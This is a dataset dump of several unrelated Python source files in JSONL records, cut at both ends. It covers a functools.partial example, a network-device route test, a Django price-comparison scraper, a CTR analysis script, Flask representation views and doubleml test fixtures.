called.\n\"\"\"\n\n\n\"\"\"\nSOLUTION\n\"\"\"\n\nimport logging\nimport math\nfrom multiprocessing import Pool\nfrom functools import partial\nfrom socketserver import StreamRequestHandler\nfrom socketserver import TCPServer\n\n\ndef spam(a, b, c, d):\n print(a, b, c, d)\n\n\n\"\"\"\nDISCUSSION\n\"\"\"\n\ndef distance(p1, p2):\n x1, y1 = p1\n x2, y2 = p2\n return math.hypot(x2 - x1, y2 - y1)\n\ndef output_result(result, log=None):\n if log is not None:\n log.debug('Got: %r', result)\n\n# A sample function\ndef add(x, y):\n return x + y\n\n\nclass EchoHandler(StreamRequestHandler):\n # ack is added keyword-only argument. *args, **kwargs are\n # any normal parameters supplied (which are passed on)\n def __init__(self, *args, ack, **kwargs):\n self.ack = ack\n super().__init__(*args, **kwargs)\n\n def handle(self):\n for line in self.rfile:\n self.wfile.write(b'GOT:' + line)\n\n\nif __name__ == '__main__':\n\n s1 = partial(spam, 1) # a = 1\n print(s1(2, 3, 4))\n print(s1(4, 5, 6))\n print('')\n\n s2 = partial(spam, d=42) # d = 42\n print(s2(1, 2, 3))\n print(s2(4, 5, 5))\n print('')\n\n s3 = partial(spam, 1, 2, d=42) # a = 1, b = 2, d = 42\n print(s3(3))\n print(s3(4))\n print(s3(5))\n print('')\n\n points = [ (1, 2), (3, 4), (5, 6), (7, 8) ]\n\n pt = (4, 3)\n points.sort(key=partial(distance, pt))\n points.sort(key=lambda p: distance(pt, p))\n print(points)\n print('')\n\n logging.basicConfig(level=logging.DEBUG)\n log = logging.getLogger('test')\n\n p = Pool()\n p.apply_async(add, (3, 4), callback=partial(output_result, log=log))\n p.apply_async(add, (3, 4), callback=lambda result: output_result(result, log))\n p.close()\n p.join()\n\n serv = TCPServer(('', 15000), partial(EchoHandler, ack=b'RECEIVED:'))\n serv = TCPServer(('', 15001),\n lambda *args, **kwargs: EchoHandler(*args,\n ack=b'RECEIVED:',\n **kwargs))\n serv.serve_forever()\n","sub_path":"ch7/7.8/example.py","file_name":"example.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"371712224","text":"import pytest\r\nimport time\r\nimport sys\r\nfrom page_obj.common.rail import *\r\nfrom os.path import dirname, abspath\r\nfrom page_obj.common.ssh import *\r\nfrom page_obj.scg.scg_def_static_route import *\r\nfrom page_obj.scg.scg_def import *\r\nfrom page_obj.scg.scg_def_ifname_OEM import *\r\nfrom page_obj.scg.scg_dev import *\r\n\r\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\r\n\r\ntest_id = \"140961\"\r\n# 添加10条路由条目,点击删除按钮,删除第五条\r\n\r\n\r\ndef test_c140961(browser):\r\n\r\n try:\r\n\r\n login_web(browser, url=dev1)\r\n\r\n for n in range(1, 11):\r\n\r\n add_static_route_single_wxw(browser, ip='20.1.'+str(n)+'.0', mask='24', out_device=interface_name_2,\r\n gateway='12.1.1.2', enable='yes')\r\n\r\n del_ipv4_static_route_bydestination(browser, destination='20.1.6.0/255.255.255.0')\r\n exist = is_static_route_exist_wxw(browser, destination='20.1.6.0/255.255.255.0')\r\n loginfo = get_log_info(browser, 管理日志)\r\n # print(loginfo)\r\n\r\n for m in range(1, 6):\r\n del_ipv4_static_route_bydestination(browser, destination='20.1.' + str(m) + '.0/255.255.255.0')\r\n for m in range(7, 11):\r\n del_ipv4_static_route_bydestination(browser, destination='20.1.' + str(m) + '.0/255.255.255.0')\r\n\r\n try:\r\n assert \"删除静态路由对象成功\" in loginfo\r\n assert exist is False\r\n rail_pass(test_run_id, test_id)\r\n except:\r\n rail_pass(test_run_id, test_id)\r\n assert \"删除静态路由对象成功\" in loginfo\r\n assert exist is False\r\n\r\n except Exception as err:\r\n # 如果上面的步骤有报错,重新设备,恢复配置\r\n print(err)\r\n rail_fail(test_run_id, test_id)\r\n reload(hostip=dev1)\r\n assert False\r\n\r\n\r\nif __name__ == '__main__':\r\n pytest.main([\"-v\", \"-s\", \"test_c\" + str(test_id) + \".py\"])","sub_path":"pyautoTest-master(ICF-7.5.0)/test_case/scg/scg_Route/test_c140961.py","file_name":"test_c140961.py","file_ext":"py","file_size_in_byte":1952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"295160015","text":"from django.shortcuts import render, render_to_response\nimport csv,sys,os\nfrom .models import Item_Model, Brand_Model, Raw_Entity, Req_Entity\nfrom .form import Form1, Form2, Form3\nfrom formtools.wizard.views import SessionWizardView, TemplateView\nimport requests\nfrom bs4 import BeautifulSoup\nimport json\nimport urllib\nfrom xml.etree import ElementTree as ET\nimport csv\nfrom django.http import HttpResponse\n\nFILENAME = \"tsum_data.csv\"\nart_list = []\n# from django.core.mail import send_mail\n\n\n# class ContactWizard(SessionWizardView):\n# template_name = \"tsum_app/contact_form.html\"\n\n# def done(self, form_list, **kwargs):\n# form_data = process_form_data(form_list)\n# return render_to_response('tsum_app/done.html', {\n# 'form_data': form_data})\n\nFORMS = [\n (\"brand_form\", Form1),\n (\"list_form\", Form2),\n (\"sites_form\", Form3),\n\n]\n\nTEMPLATES = {\n \"brand_form\" : \"tsum_app/brand.html\",\n \"list_form\" : \"tsum_app/list.html\",\n \"sites_form\" : \"tsum_app/sites_list.html\",\n\n}\n\ndef parser(request):\n items = Raw_Entity.objects.all()\n for i in items:\n\n\n gig_price = giglio_search(i.atr) \n sl_price = sl_search(i.atr)\n price = get_price(i.url)\n price = 100\n \n tsum_data = {'brand': i.brand,\n 'name': i.name,\n 'id': i.atr,\n 'url': i.url,\n 'price': price,\n 'giglio price': gig_price,\n 'sl price': sl_price\n } \n data = write_csv(tsum_data, request)\n\n return HttpResponse (data, content_type='text/csv')\n\nclass ResultView(TemplateView):\n template_name = \"tsum_app/done.html\"\n\n def get_context_data(self, **kwargs):\n context = super(ResultView, self).get_context_data(**kwargs)\n context.update({\n 'row_entity' : Raw_Entity.objects.all()\n })\n return context\n\n\n\n\ndef get_html(url):\n r=requests.get(url)\n # print(r) \n return r.text\n\ndef get_price(url):\n html = get_html(url)\n soup = BeautifulSoup(html, 'lxml')\n\n try:\n box = soup.find('div', class_ = 'item__price-wrapper price__wrap js-price-wrap')\n\n try:\n\n price = box.find('div', class_ = 'price price_type_new js-price js-price-best').text.strip()\n except:\n\n try:\n price = box.find('div', class_ = 'price price_type_old js-price js-price-old').text.strip()\n except:\n\n price = box.find('div', class_ = 'price price_type_retail js-price js-price-old').text.strip()\n\n except:\n price = '' \n\n leng = len(price)\n if (\n price[leng-1]=='₽'\n ):\n price.replace(' ', '')\n price.replace('₽', '')\n\n return price\n\n\n# def csv_d(data, request):\n# data = write_csv(ModelAdmin, request, Model.objects.all())\n\n# return HttpResponse (data, content_type='text/csv')\n\n\ndef write_csv(data, request):\n response = HttpResponse(content_type='text/csv')\n response['Content-Disposition'] = 'attachment; filename=\"somefilename.csv\"'\n with open(FILENAME, 'a', encoding='utf-8', newline='') as f:\n #column = [\"brand\",\"\",:]\n writer = csv.writer(response,f, delimiter=';')\n writer.writerow( (data['brand'],\n data['name'],\n data['id'],\n data['url'],\n data['price'],\n data['giglio price'],\n data['sl price']\n \n ))\n return response \n\n\n\n\nclass ContactWizard(SessionWizardView):\n\n def get_template_names(self):\n return [TEMPLATES[self.steps.current]]\n\n def get_context_data(self, form, **kwargs):\n context = super(ContactWizard, self).get_context_data(form=form, **kwargs)\n if self.steps.current == 'list_form':\n context.update({'ok': 'True'})\n return context\n\n def done(self, form_list, **kwargs):\n\n\n # with open(\"tsum_app/static/csv/tsum_data.csv\", 'r', encoding='utf-8') as f:\n # reader = csv.reader(f, delimiter=';')\n # for row in reader:\n # if row[0] != 'Brand':\n # ent= Raw_Entity()\n # ent.brand = row[0]\n # ent.name = row[1]\n # ent.atr = row[2]\n # ent.url = row[3]\n # ent.save()\n\n\n items = Item_Model.objects.all()\n for i in items:\n i.delete()\n\n\n form_data = process_form_data(form_list)\n addBrandForm = form_data[0]\n addListForm = form_data[1]\n addSitesForm = form_data[2]\n\n try:\n\n site1 = addSitesForm['multiple_checkboxes'][0]\n except:\n site1 = ''\n try:\n\n site2 = addSitesForm['multiple_checkboxes'][1]\n\n except:\n site2 = '' \n\n l = Req_Entity.objects.create(\n brand = addBrandForm['brand'],\n atr_1 = addListForm['atr_1'],\n atr_2 = addListForm['atr_2'],\n atr_3 = addListForm['atr_3'],\n site_1 = site1,site_2 = site2)\n print ('almost000000000000000000')\n fill_items(l)\n items = Item_Model.objects.all()\n return render_to_response('tsum_app/done.html', {\n 'items': items})\n\n\ndef fill_items(some_object):\n print ('i am here!!!!')\n items = Raw_Entity.objects.all()\n sl_price = ''\n gig_price = ''\n for i in items:\n if (i.atr == some_object.atr_1) or (i.atr == some_object.atr_2) or (i.atr == some_object.atr_3):\n\n if (some_object.site_1 != ''):\n sl_price = sl_search(i.atr)\n if (some_object.site_2 != ''):\n gig_price = giglio_search(i.atr) \n \n price = get_price(i.url)\n print ('i am here')\n\n\n l = Item_Model.objects.create(\n brand = i.brand,\n atr = i.atr,\n url = i.url,\n price = price,\n price_shop1 = sl_price,\n price_shop2 = gig_price\n )\n # items_q.put(l) \n\n # return items_q\n \n\n\ndef start_page(request):\n # items = Item_Model.objects.all()\n # for i in items:\n # art_list.append(i.atr)\n # # ItemJson = json.dumps({'art': art_list})\n # # print (ItemJson)\n # with open('tsum_app/static/js/json_items.js', 'w') as outfile:\n # json.dump({'art': art_list}, outfile)\n return render(request, 'tsum_app/base.html')\n\ndef item_list(request):\n item = Entity.objects.all()\n return render(request, 'tsum_app/item_list.html', {'item': item})\n\ndef item_new(request):\n form = EntityForm()\n return render(request, 'tsum_app/second_frame.html', {'form': form})\n\n\n\ndef process_form_data(form_list):\n form_data = [form.cleaned_data for form in form_list]\n return form_data\n\n\n# def autocomplete_city(request):\n# term = request.GET.get('term') #jquery-ui.autocomplete parameter\n# item = Entity.objects.filter(name__istartswith=term) #lookup for a city\n# res = []\n# for ш in item:\n# #make dict with the metadatas that jquery-ui.autocomple needs (the documentation is your friend)\n# dict = {'id':c.id, 'label':c.__unicode__(), 'value':c.__unicode__()}\n# res.append(dict)\n# return HttpResponse(simplejson.dumps(res))\n\n\n\n\n\n\n\n\ndef giglio_search(ar):\n art = str(ar)\n art = art.replace('/','+')\n art = art.replace(' ','+')\n giglio_url = 'https://www.giglio.com/rus/search-results/?k='\n r = requests.get(giglio_url+art) \n gig_price = giglio_catalog_content(r.text)\n return gig_price\n\ndef giglio_catalog_content(html):\n soup = BeautifulSoup(html, 'lxml')\n ads = soup.find_all('article', class_ = 'boxArt')\n gig_price = 'товар не найден'\n for ad in ads:\n first = 4\n price = ad.find('small', class_ = 'priceBox') \n try:\n del_part = price.find('del').text + price.find('q').text\n first = len(del_part)+5\n except: del_part = 0\n gig_price = price.text[first:len(price.text)]\n return gig_price \n\n\n\ndef sl_search(ar):\n art = str(ar)\n art = art.replace('/','+')\n art = art.replace(' ','+')\n # print(art)\n sl_url = 'http://www.ysl.com/Search/Index?textsearch='+art+'&siteCode=SAINTLAURENT_US&season=A%2CP%2CE&department=llmnwmn&gender='\n #sl_url = 'http://www.fwrd.com/fw/Category.jsp?search='+art\n r = requests.get(sl_url) \n sl_price = sl_catalog_content(r.text)\n\n return sl_price\n\ndef sl_catalog_content(html):\n soup = BeautifulSoup(html, 'lxml')\n # print('sl_catalog_content')\n try:\n sl_price = soup.find('div', class_ = 'infoPrice').find('span',class_ = 'value').get('data-ytos-price') \n except: \n sl_price = 'товар не найден'\n if sl_price != 'товар не найден': \n sl_price = convert_val(sl_price)\n sl_price = round(sl_price, 2)\n # print(sl_price)\n \n return sl_price\n\ndef convert_val(summa):\n convert_valuta = 0\n valueUSD = 1\n root = ET.parse(urllib.request.urlopen('http://www.cbr.ru/scripts/XML_daily.asp')).getroot()\n for x in root:\n if x.attrib['ID'] == 'R01235': valueUSD = x.find('Value').text.replace(',', '.')\n convert_valuta = float(valueUSD) * float(summa)\n\n return convert_valuta\n\n","sub_path":"tsum_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9467,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"489456262","text":"from CTR_utils import *\n\nDATA = pickle.load(open('../Datasets/DATASET_CTR_BASE.pkl'))\n\n# get data \n\nkeys_id = DATA.data.keys()\n\nvars = ['num_img', 'num_hab', 'num_ban','dim_prop','dim_total','est',\\\n 'num_zones','info_score','precio_usd','id_tipo','id_mod','id_old',\\\n 'lat','lon']\n \n\np_casa_venta = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 1 and DATA.data[k].data['id_mod'] == 1]\np_casa_arrie = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 1 and DATA.data[k].data['id_mod'] == 2]\np_dpto_venta = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 2 and DATA.data[k].data['id_mod'] == 1]\np_dpto_arrie = [DATA.data[k].data['precio_usd'] for k in keys_id if DATA.data[k].data['id_tipo'] == 2 and DATA.data[k].data['id_mod'] == 2]\n\nm_casa_venta = sum(p_casa_venta)/len(p_casa_venta)\nm_casa_arrie = sum(p_casa_arrie)/len(p_casa_arrie)\nm_dpto_venta = sum(p_dpto_venta)/len(p_dpto_venta)\nm_dpto_arrie = sum(p_dpto_arrie)/len(p_dpto_arrie)\n\nDATA_X = np.zeros((len(keys_id),len(vars)),np.float)\n\nDATA_ctr_map = np.zeros(len(keys_id))\nDATA_ctr_list = np.zeros(len(keys_id))\nDATA_ctr_land = np.zeros(len(keys_id))\nDATA_ctr = np.zeros(len(keys_id))\n\n# fill train matrix\nfor i,k in enumerate(keys_id):\n data = DATA.data[k].data\n DATA_X[i,:] = [data[var] for var in vars]\n\nprint(\"Training matrix created. Now fixing missing data...\")\n\n# fill missing data\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_img'] == False]\nfor k in k_miss:\n DATA_X[k[1],0] = 0\n\nprint(\"Fixed num_img\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_hab'] == False]\nfor k in k_miss:\n DATA_X[k[1],1] = 1\n\nprint(\"Fixed num_hab\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_ban'] == False]\nfor k in k_miss:\n DATA_X[k[1],2] = 0\n\nprint(\"Fixed num_ban\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['dim_prop'] == False]\nfor k in k_miss:\n DATA_X[k[1],3] = 60.0\n \nprint(\"Fixed dim_prop\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['dim_total'] == False or DATA.data[k].data['dim_total'] < DATA.data[k].data['dim_prop']]\nfor k in k_miss:\n DATA_X[k[1],4] = DATA_X[k[1],3]\n\nprint (\"Fixed dim_total\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['est'] == False]\nfor k in k_miss:\n if DATA.data[k[0]].data['id_tipo'] == 1:\n DATA_X[k[1],5] = 1\n else:\n DATA_X[k[1],5] = 0\n\nprint(\"Fixed est\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['num_zones'] == False]\nfor k in k_miss:\n DATA_X[k[1],6] = 0\n\nprint(\"Fixed num_zones\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['info_score'] == False]\nfor k in k_miss:\n DATA_X[k[1],7] = 200.0\n\nprint(\"Fixed info_score\")\n\nk_miss = [(k,i) for (k,i) in zip(keys_id, range(len(keys_id))) if DATA.data[k].dataexist['precio_usd'] == False]\nfor k in k_miss:\n if DATA.data[k[0]].data['id_tipo'] == 1:\n if DATA.data[k[0]].data['id_mod'] == 1:\n DATA_X[k[1],8] = m_casa_venta\n else:\n DATA_X[k[1],8] = m_casa_arrie\n else:\n if DATA.data[k[0]].data['id_mod'] == 1:\n DATA_X[k[1],8] = m_dpto_venta\n else:\n DATA_X[k[1],8] = m_dpto_arrie\n\nprint(\"Fixed precio_usd\")\n\nprint(\"Missing data fixed. Now getting CTR values...\")\n# now fill CTR values\nfor i,k in zip(range(len(keys_id)),keys_id):\n data = DATA.data[k].data\n if data['map_impr']:\n DATA_ctr_map[i] = float(data['map_visit'])/data['map_impr']\n if data['list_impr']:\n DATA_ctr_list[i] = float(data['list_visit'])/data['list_impr']\n if data['land_impr']:\n DATA_ctr_land[i] = float(data['land_visit'])/data['land_impr']\n if data['map_impr'] + data['list_impr'] + data['land_impr']:\n DATA_ctr[i] = float(data['map_visit'] + data['list_visit']+data['land_visit'])/ \\\n (data['map_impr'] + data['list_impr']+data['land_impr'])\n\nprint(\"CTR computed\")\n\n\n\nmap_impr = np.array([float(item.data['map_impr']) for item in DATA.data.values() ]) \nmap_visit = np.array([float(item.data['map_visit']) for item in DATA.data.values() ])\nlist_impr = np.array([float(item.data['list_impr']) for item in DATA.data.values() ]) \nlist_visit = np.array([float(item.data['list_visit']) for item in DATA.data.values() ])\n\nvec_tipo = np.array([float(item.data['id_tipo']) for item in DATA.data.values() ])\nvec_mod = np.array([float(item.data['id_mod']) for item in DATA.data.values() ])\nvec_precios = np.array([float(item.data['precio_usd']) for item in DATA.data.values() ])\n\nlat = np.array([float(item.data['lat']) for item in DATA.data.values() ])\nlon = np.array([float(item.data['lon']) for item in DATA.data.values() ])\n\ndias = []\nfor item in DATA.data.values():\n if item.dataexist['deleted_at']:\n ndias = (time.mktime(time.strptime(item.data['deleted_at'][:10],'%Y-%m-%d'))-time.mktime(time.strptime(item.data['created_at'][:10],'%Y-%m-%d')))/3600/24\n else:\n ndias = (time.time()-time.mktime(time.strptime(item.data['created_at'][:10],'%Y-%m-%d')))/3600/24\n dias.append(ndias)\ndias = np.array(dias)\n\n'''\ndm = [i for (i,j),k,d in zip(enumerate(map_visit),map_impr,dias) if j < 500 and j > 0 and k >= 1000 and d > 10]\n\ndl = [i for (i,j),k in zip(enumerate(list_visit),list_impr) if j < 200 and j > 0 and k >= 1000]\n\ndml = [i for i in dm if i in dl]\nimpr_ml = list_impr[dml]/map_impr[dml]\nvisit_ml = list_visit[dml]/(map_visit[dml])\n\n'''\n#precios = [(100,500),(500,1000),(1000,2000),(2000,4000),(4000,8000),(8000,16000),(16000,32000),(32000,64000),(64000,120000),(120000,240000),(240000,480000),(480000,1000000),(1000000,2000000),(2000000,np.inf)]\n#params = [(i,j,k) for i in range(1,4) for j in range(1,3) for k in range(len(precios))]\n\nparams = [(i,j) for i in range(1,4) for j in range(1,3)]\n\ncount = 0\nfor id_tipo, id_mod in params:\n dtest = [i for i,item in enumerate(DATA.data.values()) if \n item.data['id_tipo'] == id_tipo and\n item.data['id_mod'] == id_mod and\n item.data['map_impr'] > 1000 and\n item.data['map_visit'] > 0 and\n dias > 10]\n count += len(dtest)\n if len(dtest) < 10:\n continue\n \n \n print(\"\\n(%d datos) Tipo: %d, Modalidad: %d, precio: %s\"%(len(dtest),id_tipo, id_mod, str(precios[id_precio])))\n for var,value in zip(vars,np.corrcoef(np.concatenate((DATA_X[dtest,:],DATA_ctr_map[dtest].reshape(len(dtest),-1)),axis = 1),rowvar=0)[14,:]):\n print(\"%s: %f\"%(var, value))\n \n #count += len(dtest)\nprint(count)\n\n'''\npl.ion()\npl.hist(impr_ml,100),pl.show()\npl.figure()\npl.hist(visit_ml,max(visit_ml)), pl.show()\n'''\n \n\n","sub_path":"GPI_env/gpi_destacados/CTR_data_analisys.py","file_name":"CTR_data_analisys.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"297774300","text":"# coding: utf-8\n\n__author__ = 'Junki Ishida'\n\nfrom .base import BaseView\nfrom .exceptions import DefinitionError\nfrom ._compat import iteritems\n\nimport flask, json\n\ntry:\n import yaml\n\n try:\n from yaml import CSafeDumper as YAMLDumper\n except ImportError:\n from yaml import SafeDumper as YAMLDumper\nexcept ImportError:\n pass\n\ntry:\n import xmltodict\nexcept ImportError:\n pass\n\n\ndef _add_repr_func(funcs, method, media_type, func):\n if method in funcs:\n funcs[method][media_type] = func\n else:\n funcs[method] = {media_type: func}\n\n\ndef _update_repr_funcs(funcs, repr_funcs):\n for method, func_map in repr_funcs.items():\n for media_type, func in func_map.items():\n _add_repr_func(funcs, method, media_type, func)\n\n\nclass RepresentationViewBase(BaseView):\n # required\n repr_default_mimetype = None\n\n # optional\n repr_mimetype_map = None\n\n def init_class(cls):\n if cls.url_rule is not None and cls.repr_default_mimetype is None:\n raise DefinitionError(required_field=(cls.__name__, 'repr_default_mimetype',))\n __funcs = {}\n for base in cls.__bases__:\n if hasattr(base, '_repr_funcs'):\n _update_repr_funcs(__funcs, base._repr_funcs)\n if hasattr(cls, '_repr_funcs'):\n _update_repr_funcs(__funcs, cls._repr_funcs)\n if cls.repr_mimetype_map:\n for method, mimetype in cls.repr_mimetype_map.items():\n _add_repr_func(__funcs, method, mimetype, cls.represent_func)\n cls.repr_mimetype_map = None\n cls._repr_funcs = __funcs\n\n def before_dispatch(self, *args, **kwargs):\n method = flask.request.method\n if method in self._repr_funcs:\n self._repr_method = method\n elif method == 'HEAD' and 'GET' in self._repr_funcs:\n self._repr_method = 'GET'\n else:\n self._repr_method = None\n super(RepresentationViewBase, self).before_dispatch(*args, **kwargs)\n\n def find_mimetype(self):\n if self._repr_method:\n func_map = self._repr_funcs[self._repr_method]\n for mimetype, q in flask.request.accept_mimetypes:\n if mimetype in func_map:\n return mimetype\n return self.repr_default_mimetype\n return None\n\n\n def represent(self, response):\n if self._repr_method:\n func_map = self._repr_funcs[self._repr_method]\n return func_map[self._mimetype](response)\n return response\n\n @classmethod\n def represent_func(cls, response):\n raise NotImplementedError()\n\n\nclass JsonRepresentationView(RepresentationViewBase):\n repr_default_mimetype = 'application/json'\n repr_mimetype_map = {'GET': 'application/json', }\n\n @classmethod\n def represent_func(cls, response):\n return json.dumps(response)\n\n\nclass XmlRepresentationView(RepresentationViewBase):\n repr_default_mimetype = 'application/xml'\n repr_mimetype_map = {'GET': 'application/xml', }\n\n @classmethod\n def represent_func(cls, response):\n return xmltodict.unparse(response, encoding=cls.charset)\n\n\nclass YamlRepresentationView(RepresentationViewBase):\n repr_default_mimetype = 'application/x-yaml'\n repr_mimetype_map = {'GET': 'application/x-yaml', }\n\n @classmethod\n def represent_func(cls, response):\n return yaml.dump(response, Dumper=YAMLDumper)\n\n\n# jxybridge is required (https://github.com/gomi931/jxybridge)\nclass ModelRepresentationView(RepresentationViewBase):\n \"\"\"\n # either jxybridge_dumper or jxybridge_dumper_map is required\n # example:\n # # A dumper is used when receiving only GET requests.\n # jxybridge_dumper = Dumper(Model)\n # example:\n # # Dumpers can be specified for each http method.\n # jxybridge_dumper_map = {\n # 'GET': Dumper(Model),\n # 'PUT': Dumper(Model),\n # }\n \"\"\"\n jxybridge_dumper = None\n jxybridge_dumper_map = None\n\n # optional\n repr_default_mimetype = 'application/json'\n jxybridge_dump_func_association = {\n 'application/json': lambda d: lambda r: d.to_json(r),\n 'application/xml': lambda d: lambda r: d.to_xml(r, pretty_print=True),\n 'application/x-yaml': lambda d: lambda r: d.to_yaml(r),\n }\n\n def init_class(cls):\n if cls.url_rule is not None:\n if cls.jxybridge_dumper_map is None:\n if cls.jxybridge_dumper is None:\n raise DefinitionError(required_field=(cls.__name__, 'jxybridge_dumper_map'))\n cls.jxybridge_dumper_map = {'GET': cls.jxybridge_dumper, }\n __funcs = cls._repr_funcs\n for method, dumper in iteritems(cls.jxybridge_dumper_map):\n for media_type, getter in iteritems(cls.jxybridge_dump_func_association):\n _add_repr_func(__funcs, method, media_type, getter(dumper))\n cls._repr_funcs = __funcs\n\n\nclass TemplateRepresentationView(RepresentationViewBase):\n repr_template = None\n repr_default_mimetype = 'text/html'\n repr_mimetype_map = {\n 'GET': 'text/html',\n }\n\n def init_class(cls):\n if cls.url_rule is not None and cls.repr_template is None:\n raise DefinitionError(required_field=(cls.__name__, 'repr_template'))\n\n @classmethod\n def represent_func(cls, response):\n return flask.render_template(cls.repr_template, response)","sub_path":"flask_flab/representations.py","file_name":"representations.py","file_ext":"py","file_size_in_byte":5457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"566253071","text":"import numpy as np\nimport pandas as pd\n\nimport pytest\nfrom scipy.linalg import toeplitz\n\nfrom sklearn.datasets import make_spd_matrix\nfrom sklearn.datasets import make_regression, make_classification\n\nfrom doubleml.datasets import make_plr_turrell2018, make_irm_data, make_iivm_data, make_pliv_CHS2015\n\n\ndef _g(x):\n return np.power(np.sin(x), 2)\n\n\ndef _m(x, nu=0., gamma=1.):\n return 0.5/np.pi*(np.sinh(gamma))/(np.cosh(gamma)-np.cos(x-nu))\n\n\ndef _m2(x):\n return np.power(x, 2)\n\n\n@pytest.fixture(scope='session',\n params=[(500, 10),\n (1000, 20),\n (1000, 100)])\ndef generate_data1(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_plr_turrell2018(n, p, theta, return_type=pd.DataFrame)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(500, 20)])\ndef generate_data2(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_plr_turrell2018(n, p, theta)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(1000, 20)])\ndef generate_data_bivariate(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = np.array([0.5, 0.9])\n b = [1/k for k in range(1, p+1)]\n sigma = make_spd_matrix(p)\n\n # generating data\n x = np.random.multivariate_normal(np.zeros(p), sigma, size=[n, ])\n G = _g(np.dot(x, b))\n M0 = _m(np.dot(x, b))\n M1 = _m2(np.dot(x, b))\n D0 = M0 + np.random.standard_normal(size=[n, ])\n D1 = M1 + np.random.standard_normal(size=[n, ])\n y = theta[0] * D0 + theta[1] * D1 + G + np.random.standard_normal(size=[n, ])\n d = np.column_stack((D0, D1))\n column_names = [f'X{i+1}' for i in np.arange(p)] + ['y'] + \\\n [f'd{i+1}' for i in np.arange(2)]\n data = pd.DataFrame(np.column_stack((x, y, d)),\n columns=column_names)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(1000, 20)])\ndef generate_data_toeplitz(request, betamax=4, decay=0.99, threshold=0, noisevar=10):\n n_p = request.param\n np.random.seed(3141)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n\n beta = np.array([betamax * np.power(j+1, -decay) for j in range(p)])\n beta[beta < threshold] = 0\n\n cols_treatment = [0, 4, 9]\n\n sigma = toeplitz([np.power(0.9, k) for k in range(p)])\n mu = np.zeros(p)\n\n # generating data\n x = np.random.multivariate_normal(mu, sigma, size=[n, ])\n y = np.dot(x, beta) + np.random.normal(loc=0.0, scale=np.sqrt(noisevar), size=[n, ])\n d = x[:, cols_treatment]\n x = np.delete(x, cols_treatment, axis=1)\n column_names = [f'X{i+1}' for i in np.arange(x.shape[1])] + \\\n ['y'] + [f'd{i+1}' for i in np.arange(len(cols_treatment))]\n data = pd.DataFrame(np.column_stack((x, y, d)),\n columns=column_names)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(1000, 20)])\ndef generate_data_iv(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_pliv_CHS2015(n_obs=n, dim_x=p, alpha=theta, dim_z=1, return_type=pd.DataFrame)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(500, 10),\n (1000, 20),\n (1000, 100)])\ndef generate_data_irm(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n\n # generating data\n data = make_irm_data(n, p, theta, return_type='array')\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[(500, 11)])\ndef generate_data_iivm(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p[0]\n p = n_p[1]\n theta = 0.5\n gamma_z = 0.4\n\n # generating data\n data = make_iivm_data(n, p, theta, gamma_z, return_type=pd.DataFrame)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[500])\ndef generate_data_pliv_partialXZ(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p\n theta = 1.\n\n # generating data\n data = make_pliv_CHS2015(n, alpha=theta)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[500])\ndef generate_data_pliv_partialX(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p\n theta = 1.\n\n # generating data\n data = make_pliv_CHS2015(n, alpha=theta, dim_z=5)\n\n return data\n\n\n@pytest.fixture(scope='session',\n params=[500])\ndef generate_data_pliv_partialZ(request):\n n_p = request.param\n np.random.seed(1111)\n # setting parameters\n n = n_p\n theta = 1.\n\n # generating data\n data = make_data_pliv_partialZ(n, alpha=theta, dim_x=5)\n\n return data\n\n\ndef make_data_pliv_partialZ(n_obs, alpha=1., dim_x=5, dim_z=150):\n xx = np.random.multivariate_normal(np.zeros(2),\n np.array([[1., 0.6], [0.6, 1.]]),\n size=[n_obs, 